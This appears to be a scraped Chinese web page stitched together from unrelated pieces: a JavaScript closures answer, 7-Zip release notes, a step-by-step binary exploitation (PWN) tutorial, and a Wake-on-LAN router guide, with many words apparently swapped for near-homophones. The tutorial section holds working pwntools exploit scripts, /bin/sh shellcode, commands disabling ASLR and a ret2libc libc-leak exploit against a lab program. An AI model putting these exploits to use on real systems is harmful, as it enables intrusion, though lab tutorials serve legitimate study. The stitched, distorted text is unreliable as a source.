在外部函数中， this 和self 两者都指向了 myObject，因而两者都可以正确地引证和拜访 foo。 在内部函数中， this 不再指向 myObject。 其成果是，this.foo 没有在内部函数中被界说，相反，指向到本地的变量self 保持在规模内，而且可以拜访。 (在ECMA 5之前，在内部函数中的this 将指向大局的 window 目标;反之，由于作为ECMA 5，内部函数中的功用this 是未界说的。 )4.封装JavaScript源文件的全部内容到一个函数块有什么含义及理由?这是一个越来越遍及的做法，被许多盛行的JavaScript库(jQuery，Node.js等)选用。 这种技能创立了一个环绕文件全部内容的闭包，也许是最重要的是，创立了一个私有的命名空间，然后有助于防止不同JavaScript模块和库之间潜在的称号抵触。 这种技能的另一个特色是，答应一个易于引证的(假定更短的)别号用于大局变量。 这一般用于，例如，jQuery插件中。 jQuery答应你运用jQuery.noConflict()，来禁用 $ 引证到jQuery命名空间。 在完结这项作业之后，你的代码仍然可以运用$ 运用这种闭包技能，如下所示：(function($){/*jQueryplugincodereferencing$*/})(jQuery);#include 下载地址:7-Zip 18.01 Final x86 (1.06 MB)7-Zip 18.01 Final x64 (1.31 MB)What's new after 7-Zip 18.00 beta:7-Zip now can unpack DMG archives that use LZFSE compression method.7-Zip now doesn't allow update operation for archives that have read-only attribute.The BUG was fixed:extracting from tar with -si switch didn't set timestamps for directories.Some bugs were fixed. 一步一步学PWN一、环境：ubuntu虚拟机pwntoolsLibcSearcherROPgadget参阅：https://www.fjt1.com二、寄存器相关常识：EIP：首要用于寄存当时代码段行将被履行的下一条指令的偏移，但其本质上并不能直接被指令直接拜访。 最典型的栈溢出运用是掩盖程序的回来地址为进犯者所操控的地址，也便是掩盖EIPESP：栈顶指针，一直指向栈顶EBP：栈底指针，一般叫栈基址三、软件维护机制：CANNARY(栈维护)栈溢出维护是一种缓冲区溢出进犯缓解手法，当启用栈维护后，函数开端履行的时分会先往栈里刺进cookie信息，当函数实在回来的时分会验证cookie信息是否合法，假如不合法就中止程序运转。 进犯者在掩盖回来地址的时分往往也会将cookie信息给掩盖掉，导致栈维护检查失利而阻挠shellcode的履行。 在Linux中咱们将cookie信息称为canary。 NX（DEP）(数据履行维护 Data Execution Prevention)NX即No-eXecute（不行履行）的意思，NX（DEP）的基本原理是将数据地点内存页标识为不行履行，当程序溢出成功转入shellcode时，程序会测验在数据页面上履行指令，此刻CPU就会抛出反常，而不是去履行歹意指令。 PIE（ASLR）内存地址随机化机制（address space layout randomization)，有以下三种状况：0 - 表明封闭进程地址空间随机化1 - 表明将mmap的基址，stack和vdso页面随机化2 - 表明在1的基础上添加堆（heap）的随机化四、简略原理：当咱们在输入数据时，假如程序对输入没有约束，会导致输入的超出预订的规模，掩盖掉原本的数据左面为正常状况，右边是输入超出约束后假如咱们输入的不是一般的数据，而是结构的数据会怎样？结构后栈散布状况咱们完全能够经过更改原本的回来地址来操控程序的走向，上图中就运用回来地址来完结履行 shellcode当然上面那种状况是啥维护都不开的状况，咱们先从最简略的开端这儿用的是蒸米rop x86的比如源码如下：#include #include #include void vulnerable_function() {char buf[128];read(STDIN_FILENO, buf, 256); } int main(int argc, char** argv){ vulnerable_function();write(STDOUT_FILENO, "Hello, Worldn", 13);}运用以下指令进行编译：gcc -m32 -fno-stack-protector -z execstack -o level1 level1.c-m32意思是编译为32位的程序-fno-stack-protector和-z execstack这两个参数会分别关掉DEP和Stack Protector在 root 权限下履行：echo 0 > /proc/sys/kernel/randomize_va_space这样就关掉了整个体系的ASLR运用checksec指令来检查一下维护机制：运用一个python脚原本发作点数据python pattern.py create 150gdb ./level1调试程序r 运转，输入之前用脚本发明的字符串回车后发现报错如下：再运用 python 脚原本核算一下偏移：python pattern.py offset 0x37654136这儿解释一下，在 gdb 里报错的原因是原本的回来地址被咱们输入的字符串掩盖掉了，掩盖为了0x37654136，当程序去回来的时分出错了，运用 pattern.py offset核算出来的便是整个栈的巨细也便是说此刻的栈状况是如图所示：依据之前讲的原理，假如咱们能够找到填充的字符串开端的当地，把 0x37654136 改成找到的地址就能够履行咱们的句子了就像这样：那就能够顺畅履行到咱们期望能够履行的 shellcode 了还有个问题：gdb 的调试环境会影响 buf 在内存中的方位，尽管咱们封闭了 ASLR，但这只能确保 buf 的地址在 gdb 的调试环境中不变，但当咱们直接履行 ./level1 的时分，buf 的方位会固定在其他地址上这儿选用的办法是敞开：core dumpulimit -c unlimited敞开之后，当呈现内存过错的时分，体系会生成一个 core dump 文件在当时目录下。 然后咱们再用 gdb 检查这个 core 文件就能够获取到 buf 实在的地址了。 运用gdb调试转储的gdb level1 core运用x/10s $esp-144检查shellcode地址为什么是 esp-144 ？由于咱们报错的时分其实现已履行的到回来地址了，所以要在 140 的栈空间的基础上加上 4 字节的回来地址空间用 python 结合 pwntools 写运用脚本from pwn import *p = process('./level1')ret = 0xffffcee0shellcode = "x31xc9xf7xe1x51x68x2fx2fx73"shellcode += "x68x68x2fx62x69x6ex89xe3xb0"shellcode += "x0bxcdx80"payload = shellcode + 'A' * (140 - len(shellcode)) + p32(ret)p.send(payload)p.interactive()运用成功：接下来来进阶：依旧是蒸米的，运用这条指令编译翻开栈不行履行gcc -m32 -fno-stack-protector -o level2 level2.c这样之前的脚本就无法用了，由于咱们的 shellcode 是写在栈上的。 这时分就要用到另一种办法了 -- ret2libcret2libc 即操控函数的履行 libc 中的函数，一般是回来至某个函数的 plt 处或许函数的具体方位，一般状况下，咱们会挑选履行 system("/bin/sh")。 那么咱们怎样得到 system 函数的地址呢？这儿就首要运用了两个常识点system 函数归于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。 即便程序有 ASLR 维护，也仅仅针对于地址中间位进行随机，更低的 12 位并不会发作改动。 简略点说便是咱们现在无法在栈上履行需求的指令了，可是咱们能够去其他当地履行，在 libc.so 中就正好有咱们需求找的：system("/bin/sh")。 上题：前面提到关掉 ASLR 后 system() 函数在内存中的地址是不会改变的，而且 libc.so 中也包括 "/bin/sh" 这个字符串，而且这个字符串的地址也是固定的咱们运用 gdb 来找到这些地址用gdb ./level2调试咱们首先在main函数上下一个断点：b main然后履行程序：r这样的话程序会加载 libc.so 到内存中然后咱们就能够经过：print system这个指令来获取 system 函数在内存中的方位接下来咱们能够经过find指令来查找：find "/bin/sh" "/bin/sh" 这个字符串这样就找到了咱们需求的数据：system地址：0xf7e41940/bin/sh地址：0xf7f6002b写出 exp：from pwn import *p = process('./level2')ret = 0xffd76390systemaddr=0xf7e41940binshaddr=0xf7f6002bpayload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)p.send(payload)p.interactive()关于 ret 地址：system() 后边跟的是履行完 system() 后要回来的地址，接下来才是要给 system() 传递的参数："/bin/sh" 字符串的地址。 而咱们意图是履行 "/bin/sh"，ret 无所谓。 现在栈的散布大致是：运用成功：现在咱们翻开 ASLR，依旧是在root下echo 2 > /proc/sys/kernel/randomize_va_space这样由于地址随机化，咱们曾经的exp现已无效了咱们能够用ldd level2指令看一下 libc 的地址，每一次都在改变那咱们该怎样处理呐？咱们能够先泄漏出 libc.so 某些函数在内存中的地址，然后再运用泄漏出的函数地址依据偏移量核算出 system() 函数和 /bin/sh 字符串在内存中的地址，然后再履行咱们的 ret2libc 的 shellcode 就能够了运用：objdump -d -j .plt level2检查能够运用的函数运用：objdump -R level2检查对应 got 表由于 system() 函数和 write() 在 libc.so 中的 offset (相对地址)是不变的，所以假如咱们得到了 write() 的地址而且具有 libc.so 就能够核算出 system() 在内存中的地址了from pwn import *libc = ELF('libc.so')elf = ELF('level2')p = process('./level2')plt_write = elf.symbols['write']got_write = elf.got['write']vulfun_addr = 0x08048404payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)p.send(payload1)write_addr = u32(p.recv(4))system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)p.send(payload2)p.interactive()来解析一下 exp：payload1的意思是：填充 140 个 A 后回来地址掩盖为 write 函数，经过 got_write 将 write 函数的实在地址走漏出来，履行完结 write 函数之后，回来地址为 vul 函数，再次运用 vul 函数的溢出缝隙，完结缝隙运用作业运用成功：文件及脚本打包：链接：https://pan.baidu.com/s/1r0yNqwS_AzpXaqrfVQZ3nA提取码：l9dz有很多人只知道怎样运用内网进行长途电脑开机，而不清楚外网是怎样操作的，今日就由小编教咱们快速建立自己的电脑外网开机设置。 假如咱们还不知道内网开机是怎样运用，能够重视小编后，检查小编主页，有视频教程哦。 接下来外网长途开机教程开端。 电脑需求主板支撑长途唤醒功用 以华硕、联想、技嘉主板为例。 假如不在这3个品牌，能够重视私信我，我会发你一个比较具体的教程。 敞开BIOS：当电脑开机发动时，经过重复按键盘“DELETE”键或“F2”键，进入到主板BIOS设置界面。 假如以上办法无效，请自行搜索相关电脑主板敞开办法。 联想：进入Power——Automatic Power ON——Wake On LAN设为Enabled。 华硕：进入高档——高档电源办理——敞开由PCI/PCIE设备唤醒选项。 技嘉：进入BIOS功用—— *** 发动——挑选Legacy First或UEFI First选项。 建立电脑外网设置 1、 这儿我就以路由器：TL-WR886N 为例进行操作，不同牌子的路由器界面不一样，可是功用原理都是迥然不同。 首要路由器后，找到姓名为：IP与MAC绑定，其他牌子姓名都差不多，如下图。 2、然后，咱们需求把方针电脑IP和MAC地址进行绑定，由于现在家庭都会有无线设备连接到路由器上，假如不进行绑定，局域网的IP地址就会不固定，就会形成咱们后续无法成功端口映射（当然这是后话了），怎样找自己的内网IP地址，这儿我就不说明晰，能够转看主页上的视频教程。 如下图。 3、找到方针主机所对应的设置，增加后即可，趁便再记下MAC地址，后续要用。 接着是重要的过程，动态域名解析DDNS，这个是取决于你能不能在千里之外成功长途开机电脑的要害之处，请一定要仔细阅读。 4、翻开DDNS后，假如你是想运用TP路由器自带解析IP的话，你要在路由器注册个帐号，登录即可。 如图所示假如你电脑上没有这个功用，那必定有花生壳解析服务，自己自行去搜索注册后，输入帐号密码即可，然后记住增加后有个DDNS域名，如上图所示，把域名仿制下来。 5、最终一步，设置端口映射，我这儿姓名叫：虚拟服务器，设置表里端口都共同，我这边设置980，然后填写内网IP地址，留意协议一定要挑选UDP，最终增加即可。 电脑端长途开机 1、 这便是需求用一款软件了，我暂时取名叫：长途开机，如图所示长途开机 2、 接下来的过程就很简略了，只需求填上刚刚仿制下来的域名、端口、还有MAC地址顺次填写对应的文本框即可，最终点击外网发送按钮即可。 APP安卓端 安卓端运用办法与电脑端共同，仅有不同的是，安卓端的MAC地址需求把中心横杆删去即可。 如下图需求软件的，能够重视私信小编要害字：长途开机，即可获取下载地址。 我是“徐小峰”，假如喜欢我的教程，费事点赞、重视、谈论，谢谢，有不同定见欢迎在下方谈论。 NewProgramName.Length());

操控用于ethr的操控信道通讯。